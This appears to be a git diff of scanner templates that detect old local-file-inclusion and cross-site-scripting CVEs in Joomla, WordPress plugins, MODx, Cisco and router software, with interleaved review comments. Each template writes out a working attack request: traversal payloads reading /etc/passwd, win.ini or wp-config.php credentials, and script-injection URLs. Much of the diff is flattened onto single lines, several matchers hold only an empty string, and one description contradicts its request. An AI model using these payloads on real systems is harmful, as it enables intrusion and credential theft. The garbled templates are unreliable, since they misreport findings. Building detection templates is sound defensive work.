- tags: cve,cve2010,tikiwiki,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini" - stop-at-first-match: true - matchers: - - type: word - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - part: body 
diff --git a/poc/cve/cve-2010-4617.yaml b/poc/cve/cve-2010-4617.yaml deleted file mode 100644 index f172f0e5d8..0000000000 --- a/poc/cve/cve-2010-4617.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2010-4617 - -info: - name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/15791 - - https://www.cvedetails.com/cve/CVE-2010-4617 - - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-4617 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/poc/cve/cve-2010-5028-2025.yaml b/poc/cve/cve-2010-5028-2025.yaml new file mode 100644 index 0000000000..9c09573b07 --- /dev/null +++ b/poc/cve/cve-2010-5028-2025.yaml 
@@ -0,0 +1,29 @@
+id: CVE-2010-5028
+info:
+ name: Joomla! Component JE Job 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12601
+ - https://www.cvedetails.com/cve/CVE-2010-5028
+ - http://www.vupen.com/english/advisories/2010/1269
+ - http://web.archive.org/web/20210126225410/https://www.securityfocus.com/bid/40193/
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-5028
+ tags: cve,cve2010,joomla,lfi
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/18
diff --git a/poc/cve/cve-2010-5278-2030.yaml b/poc/cve/cve-2010-5278-2030.yaml
new file mode 100644
index 0000000000..2df290ba03
--- /dev/null
+++ b/poc/cve/cve-2010-5278-2030.yaml
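Review bot: The `description` in poc/cve/cve-2010-5028-2025.yaml contradicts the check the template performs: it describes a SQL injection through the `catid` parameter, while the name, the `lfi` tag and the request all test a directory traversal in the `view` parameter. A hit would be recorded under CVE-2010-5028 with the wrong vulnerability class, which misleads triage and the choice of fix. Either the description or the id and request need correcting; until that is verified against the references I would add `# NOTE(review): description (SQL injection, catid) and request (traversal, view) disagree - confirm the CVE id`.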
@@ -0,0 +1,32 @@
+id: CVE-2010-5278
+info:
+ name: MODx manager - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled.
+ reference:
+ - https://www.exploit-db.com/exploits/34788
+ - https://www.cvedetails.com/cve/CVE-2010-5278
+ - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt
+ - http://secunia.com/advisories/41638
+ classification:
+ cve-id: CVE-2010-5278
+ tags: cve,cve2010,lfi
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+ part: body
+
+# Enhanced by mp on 2022/03/30
diff --git a/poc/cve/cve-2010-5278.yaml b/poc/cve/cve-2010-5278.yaml
new file mode 100644
index 0000000000..7bc17d9f24
--- /dev/null
+++ b/poc/cve/cve-2010-5278.yaml
@@ -0,0 +1,35 @@
+id: CVE-2010-5278
+
+info:
+ name: MODx manager - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled.
+ reference:
+ - https://www.exploit-db.com/exploits/34788
+ - https://www.cvedetails.com/cve/CVE-2010-5278
+ - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt
+ - http://secunia.com/advisories/41638
+ classification:
+ cve-id: CVE-2010-5278
+ tags: cve,cve2010,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+ part: body
+
+# Enhanced by mp on 2022/03/30
diff --git a/poc/cve/cve-2011-2744.yaml b/poc/cve/cve-2011-2744.yaml
deleted file mode 100644
index c303e15090..0000000000
--- a/poc/cve/cve-2011-2744.yaml
+++ /dev/null
@@ -1,33 +0,0 @@ -id: CVE-2011-2744 - -info: - name: Chyrp 2.x - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. - reference: - - https://www.exploit-db.com/exploits/35945 - - https://www.cvedetails.com/cve/CVE-2011-2744 - - http://www.openwall.com/lists/oss-security/2011/07/13/6 - - http://secunia.com/advisories/45184 - classification: - cve-id: CVE-2011-2744 - tags: cve,cve2011,lfi,chyrp - -requests: - - method: GET - path: - - "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/18 diff --git a/poc/cve/cve-2011-3315-2059.yaml b/poc/cve/cve-2011-3315-2059.yaml deleted file mode 100644 index 855379ffba..0000000000 --- a/poc/cve/cve-2011-3315-2059.yaml +++ /dev/null 
@@ -1,25 +0,0 @@ -id: CVE-2011-3315 - -info: - name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. - reference: https://www.exploit-db.com/exploits/36256 - tags: cve,cve2011,lfi,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2011-4926.yaml b/poc/cve/cve-2011-4926.yaml new file mode 100644 index 0000000000..a5cfb54cf7 --- /dev/null +++ b/poc/cve/cve-2011-4926.yaml 
@@ -0,0 +1,51 @@
+id: CVE-2011-4926
+
+info:
+ name: Adminimize 1.7.22 - Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
+ remediation: |
+ Update to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2011-4926
+ - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926
+ - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5
+ - http://www.openwall.com/lists/oss-security/2012/01/10/9
+ - http://wordpress.org/extend/plugins/adminimize/changelog/
+ classification:
+ cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2011-4926
+ cwe-id: CWE-79
+ epss-score: 0.01792
+ epss-percentile: 0.86706
+ cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: bueltge
+ product: adminimize
+ google-query: inurl:"/wp-content/plugins/adminimize/"
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+# digest: 490a00463044022074b143fc402b0cb088d3000103ddd8072955cf969ab5969c9dd24c014962b58202203d3b2b0c012567fd976de1950cd4c3efcbe50edd832ada1542ce0283984d4384:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2011-5179.yaml b/poc/cve/cve-2011-5179.yaml
deleted file mode 100644
index e104139d85..0000000000
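Review bot: The body matcher's only entry under `words:` is the empty string `""`, which every response body contains, so under `matchers-condition: and` the check reduces to "status 200 and text/html" and reports any host that answers this URL with an HTML page, vulnerable or not. If the committed file really holds `""` (and this page has not simply dropped a markup-like string), the word has to be the exact reflected string sent in `path:`, and the trailing `# digest:` line would presumably no longer verify against content that differs from what was signed. The same empty body word appears in the hunks for cve-2012-2371.yaml, cve-2012-4273-2198.yaml, cve-2012-4768-2207.yaml, cve-2014-9094.yaml, cve-2014-9606-2430.yaml (as `''`) and cve-2015-7780-2604.yaml, where only `"java.sun.com"` is left as a real condition.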
--- a/poc/cve/cve-2011-5179.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2011-5179 - -info: - name: Skysa App Bar 1.04 - Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. - remediation: | - Upgrade to a patched version of Skysa App Bar or apply appropriate security controls to sanitize user input and prevent XSS attacks. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-5179 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/71486 - classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N - cvss-score: 4.3 - cve-id: CVE-2011-5179 - cwe-id: CWE-79 - epss-score: 0.00232 - epss-percentile: 0.61177 - cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: skysa - product: skysa_app_bar_integration_plugin - google-query: inurl:"/wp-content/plugins/skysa-official/" - tags: cve,cve2011,wordpress,xss,wp-plugin - -http: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 4a0a00473045022067011df53d660d9f6e1623e4af7eef9730c0a2a58862db762b68ec72b569eb4e022100c240fa22371e7748774cf97615ad01bafc5ba32caa888b38b0ae17e7cd42599c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2012-0896-2132.yaml b/poc/cve/cve-2012-0896-2132.yaml deleted file mode 100644 index a862bf8c9a..0000000000 --- a/poc/cve/cve-2012-0896-2132.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2012-0896 - -info: - name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access - author: daffainfo - severity: high - description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. - reference: - - https://packetstormsecurity.com/files/108631/ - - https://www.cvedetails.com/cve/CVE-2012-0896 - tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal - classification: - cve-id: CVE-2012-0896 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/cve-2012-0981.yaml b/poc/cve/cve-2012-0981.yaml new file mode 100644 index 0000000000..eef133b20b --- /dev/null +++ b/poc/cve/cve-2012-0981.yaml @@ -0,0 +1,33 @@ +id: CVE-2012-0981 + +info: + name: phpShowtime 2.0 - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/18435 + - https://www.cvedetails.com/cve/CVE-2012-0981 + - http://secunia.com/advisories/47802 + - http://www.exploit-db.com/exploits/18435 + classification: + cve-id: CVE-2012-0981 + tags: cve,cve2012,lfi,phpshowtime + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/cve-2012-2371.yaml b/poc/cve/cve-2012-2371.yaml new file mode 100644 index 0000000000..27614e05bc --- /dev/null 
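Review bot: In the cve-2012-0981.yaml hunk the `description` says the flaw lets an attacker list directories and image files, but the matcher `"root:.*:0:0:"` only fires when the contents of a text file come back, so the documented impact and the detection condition do not line up. Either the description should explain why file contents are returned, or the matcher should key on what a listing response looks like; as written, a vulnerable host that only returns listings would be missed. `reference:` also carries exploit-db 18435 twice, once as https and once as http. poc/cve/cve-2014-9609-2437.yaml later in this commit has the same mismatch ("list directory contents" against the same regex).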
+++ b/poc/cve/cve-2012-2371.yaml @@ -0,0 +1,50 @@ +id: CVE-2012-2371 + +info: + name: WP-FaceThumb 0.1 - Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. + remediation: | + Update to the latest version of the WP-FaceThumb plugin (0.2 or higher) which includes proper input sanitization to mitigate the XSS vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-2371 + - http://www.openwall.com/lists/oss-security/2012/05/15/12 + - http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html + - http://wordpress.org/support/topic/plugin-wp-facethumb-reflected-xss-vulnerability-cwe-79 + - http://www.openwall.com/lists/oss-security/2012/05/16/1 + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 + cve-id: CVE-2012-2371 + cwe-id: CWE-79 + epss-score: 0.00825 + epss-percentile: 0.79974 + cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: mnt-tech + product: wp-facethumb + tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin + +http: + - method: GET + path: + - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 490a0046304402203ed6d753c323a3a6bec82c92c318bf9c494fa3b7b1471e77916b418e8bda843d022073aca0b09ce0b0bd30a909c4f88168507ac148074ad060244f1ada17bb00066e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2012-4273-2198.yaml b/poc/cve/cve-2012-4273-2198.yaml new file mode 100644 index 0000000000..eec897c5e8 --- /dev/null 
+++ b/poc/cve/cve-2012-4273-2198.yaml @@ -0,0 +1,33 @@ +id: CVE-2012-4273 +info: + name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798 + - http://wordpress.org/extend/plugins/2-click-socialmedia-buttons/changelog/ + - http://packetstormsecurity.org/files/112615/WordPress-2-Click-Socialmedia-Buttons-Cross-Site-Scripting.html + classification: + cve-id: CVE-2012-4273 + tags: cve,cve2012,wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/cve-2012-4768-2207.yaml b/poc/cve/cve-2012-4768-2207.yaml new file mode 100644 index 0000000000..7d55437591 --- /dev/null +++ b/poc/cve/cve-2012-4768-2207.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2012-4768 +info: + name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 + - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt + - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html + classification: + cve-id: CVE-2012-4768 + tags: cve,cve2012,wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/cve-2013-5528.yaml b/poc/cve/cve-2013-5528.yaml deleted file mode 100644 index 054a82604c..0000000000 --- a/poc/cve/cve-2013-5528.yaml +++ /dev/null 
@@ -1,33 +0,0 @@ -id: CVE-2013-5528 - -info: - name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 - reference: - - https://www.exploit-db.com/exploits/40887 - - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528 - - http://web.archive.org/web/20210122130958/https://www.securityfocus.com/bid/62960/ - classification: - cve-id: CVE-2013-5528 - tags: cve,cve2013,lfi,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/cve-2013-5979-2280.yaml b/poc/cve/cve-2013-5979-2280.yaml deleted file mode 100644 index 1149dd7311..0000000000 --- a/poc/cve/cve-2013-5979-2280.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2013-5979 -info: - name: Xibo 1.2.2/1.4.1 - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/26955 - - https://nvd.nist.gov/vuln/detail/CVE-2013-5979 - - https://www.cvedetails.com/cve/CVE-2013-5979 - - https://bugs.launchpad.net/xibo/+bug/1093967 - classification: - cve-id: CVE-2013-5979 - tags: cve,cve2013,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/cve-2013-7240.yaml b/poc/cve/cve-2013-7240.yaml new file mode 100644 index 0000000000..6ad0335e9a --- /dev/null +++ b/poc/cve/cve-2013-7240.yaml 
@@ -0,0 +1,40 @@
+id: CVE-2013-7240
+
+info:
+ name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/38936
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
+ - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/
+ - http://seclists.org/oss-sec/2013/q4/570
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2013-7240
+ cwe-id: CWE-22
+ tags: cve,cve2013,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ - "DB_HOST"
+ - "The base configurations of the WordPress"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/24
diff --git a/poc/cve/cve-2014-2962-2313.yaml b/poc/cve/cve-2014-2962-2313.yaml
new file mode 100644
index 0000000000..2456af7a2e
--- /dev/null
+++ b/poc/cve/cve-2014-2962-2313.yaml
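Review bot: A positive match on this template means the response body is the target's `wp-config.php`, so anything that stores the scan output (response dumps, logs, tickets) then holds database credentials, and the template says nothing about that. I would add a comment above `matchers:` such as `# a match means the response contains DB credentials; treat stored responses as secret`. The word matcher with `condition: and` also requires the stock header text `"The base configurations of the WordPress"`, which a site with a stripped or translated config file will not contain, so a vulnerable host can be missed; `DB_NAME`, `DB_PASSWORD` and `DB_HOST` are the stable part of the signal. `requests:` is the older key, and the signed templates in this commit use `http:`.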
@@ -0,0 +1,25 @@
+id: CVE-2014-2962
+
+info:
+ name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
+ reference: https://www.exploit-db.com/exploits/38488
+ tags: cve,cve2014,lfi,router,firmware,traversal
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2014-4561-2375.yaml b/poc/cve/cve-2014-4561-2375.yaml
deleted file mode 100644
index aaffe503df..0000000000
--- a/poc/cve/cve-2014-4561-2375.yaml
+++ /dev/null
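Review bot: This template has no `classification:` block, so the `cve-id: CVE-2014-2962` field that the sibling templates in this commit carry is missing and a finding cannot be joined to the CVE by that field. `name` says 1.00.08/1.00.09 while `description` says "firmware before 1.00.08"; one of the two should be corrected against the advisory so that triage knows which firmware is in scope. `reference:` is a bare string here but a list in the other templates, and the regex `"root:.*:0:0"` lacks the trailing colon the neighbouring templates use (`"root:.*:0:0:"`), which makes it slightly looser than the rest of the set.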
@@ -1,35 +0,0 @@ -id: CVE-2014-4561 -info: - name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability. - reference: - - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d - - https://nvd.nist.gov/vuln/detail/CVE-2014-4561 - - http://codevigilant.com/disclosure/wp-plugin-ultimate-weather-plugin-a3-cross-site-scripting-xss/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2014-4561 - cwe-id: CWE-79 - tags: cve,cve2014,wordpress,wp-plugin,xss,weather -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '">' - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/cve-2014-4940.yaml b/poc/cve/cve-2014-4940.yaml deleted file mode 100644 index 13f17a9af9..0000000000 --- a/poc/cve/cve-2014-4940.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2014-4940 - -info: - name: WordPress Plugin Tera Charts - Directory Traversal - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-4940 - - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail= - - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/ - classification: - cve-id: CVE-2014-4940 - tags: cve,cve2014,wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/cve-2014-9094.yaml b/poc/cve/cve-2014-9094.yaml new file mode 100644 index 0000000000..8363259c7c --- /dev/null +++ b/poc/cve/cve-2014-9094.yaml 
@@ -0,0 +1,49 @@ +id: CVE-2014-9094 + +info: + name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting + author: daffainfo + severity: medium + description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter. + remediation: | + Update to the latest version of the WordPress DZS-VideoGallery Plugin, which includes a fix for this vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + - http://websecurity.com.ua/7152/ + - http://seclists.org/fulldisclosure/2014/Jul/65 + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 + cve-id: CVE-2014-9094 + cwe-id: CWE-79 + epss-score: 0.32637 + epss-percentile: 0.96584 + cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: digitalzoomstudio + product: video_gallery + framework: wordpress + google-query: inurl:"/wp-content/plugins/dzs-videogallery" + tags: cve2014,wordpress,xss,wp-plugin,seclists,cve + +http: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4b0a00483046022100d75932a72e0aa224c8e98c949a91e0c38f2115c1f11e070b55d822e1089d9219022100f3b8ee644a18bf8300e32cce2c725d40bb3056d4e61f01b5964e15adb11d13d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2014-9606-2430.yaml b/poc/cve/cve-2014-9606-2430.yaml new file mode 100644 index 0000000000..0dbcbe73af --- /dev/null +++ b/poc/cve/cve-2014-9606-2430.yaml 
